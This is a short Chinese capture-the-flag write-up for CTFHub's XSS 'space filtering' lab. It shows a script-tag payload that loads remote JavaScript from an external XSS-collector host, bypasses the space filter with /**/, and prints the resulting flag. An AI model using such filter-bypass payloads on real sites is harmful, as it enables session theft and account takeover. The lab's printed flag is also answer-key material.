CTFHUB技能树之XSS——过滤空格

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题


在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理


用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

相关推荐
Algorithm15765 分钟前
JVM是什么,与Java的关系是什么,以及JVM怎么实现的跨平台性
java·开发语言·jvm
Gnevergiveup6 分钟前
2024网鼎杯青龙组Web+Misc部分WP
开发语言·前端·python
你不讲 wood25 分钟前
使用 Axios 上传大文件分片上传
开发语言·前端·javascript·node.js·html·html5
Iqnus_1231 小时前
vue下载安装
前端·vue.js·笔记
遇见你真好。1 小时前
SpringBoot整合quartz定时任务
java·springboot·quartz
一颗甜苞谷1 小时前
开源一款基于 JAVA 的仓库管理系统,支持三方物流和厂内物流,包含 PDA 和 WEB 端的源码
java·开发语言·开源
攻心的子乐1 小时前
idea使用svn
java·ide·intellij-idea
网安_秋刀鱼1 小时前
CSRF防范及绕过
前端·安全·web安全·网络安全·csrf·1024程序员节
程序员大佬超1 小时前
IDEA解决 properties 文件乱码问题
java·ide·intellij-idea
ac-er88881 小时前
PHP的 CSRF、XSS 攻击和防范
php·xss·csrf